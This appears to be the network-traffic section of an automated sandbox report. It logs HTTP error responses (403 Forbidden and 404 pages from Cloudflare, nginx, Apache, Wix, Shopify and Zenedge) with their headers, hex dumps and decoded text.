                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:35 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0MdwAgeyWW62fzTjkAsv2axmzbze%2B7lgFpYnINIYs9GPYLH4QlgdMPK3QUFD%2Ftv70Zrfwwc5fUOXRe9dDZTJZDLen2JqLhlhsc%2F4poFw1C%2FxLz1po3%2BhzYauNeIoUBca"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6c3d1f603606-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:06:50 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CH2%2BqmB7pHHOs0h5vC0BvsmQd%2F0nMelRaRKoC5a5H66287%2FmE9iwRFIYzWL2iFmGEDeZRpSgXCtCy0e9Xfph3SOE8wAyWeiFvl4%2FNTWt018sKmxdZX2aTZEQsCeAnA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7e1d6c3e48e89018-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 Data Ascii: 119c<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compa
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:35 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:35 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdU2dumBKhu0CZVWGt/q/AG,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1688537195.45095345711016272X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1688537196.04029464890323079X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Wed, 05 Jul 2023 06:06:36 GMTX-Served-By: cache-mxp6940-MXPX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojIIhjPFu7bfRzggTjXh63HG+,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:36 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:36 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 05 Jul 2023 06:06:37 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:06:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=20X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 78e15712-30bf-48a4-8db1-2ebc3d27e1f9CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6BtVSXA3Z1zlUC4se%2BfQ1d%2B%2FgW%2Brt1yaq0CMshUX64GSLyoo2ka0pheSKa03EMxcPTbJnm7%2BNFu2qMmb0Q3NbUVYHrA%2FTwxkOWvLd%2BzOZ5sAW5ASD3UXhciy%2Bi3F2d4%2FJA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=151.000023Server: cloudflareCF-RAY: 7e1d6c4b39c61947-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Cache-Status: Server: ZENEDGEX-Zen-Fury: 093b75a4f2832976108cdaa6307d021210592164Date: Wed, 05 Jul 2023 06:06:39 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Data Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 33 30 37 34 22 2c 20 31 36 38 38 35 33 37 31 35 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 38 38 35 33 37 31 35 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 37 31 33 39 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 30 35 20 4a 75 6c 20 32 30 32 33 20 30 36 3a 30 38 3a 33 39 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC3074", 1688537158, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1688537158 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:42 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cfOaFziac7euOhbc4C7DonimN8mFP0PmrmuXzvMhBKLYO%2FcefNDPJWSyXjlg8I65AtaNds1YVAYRkdfGWHLg%2BP%2BInRCyWkFPdwiPVc%2FRVKt2jHb7uirOsjlLStnDqBFk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6c6b3b6f18e1-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:06:42 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FfmQrQL1yGPOrdu4xIavRIeKMb8ByZPS3t2hYSsG%2Bz6Pios9l6uCD%2Fc2U0l%2FELApL3l8XKnlYGb3N%2BM2jHd2%2BT4k01NKwsWtIl0YwYu%2F82uxKB38LLUtM%2FEFpDKmUfEz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6c6b6b9718e1-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
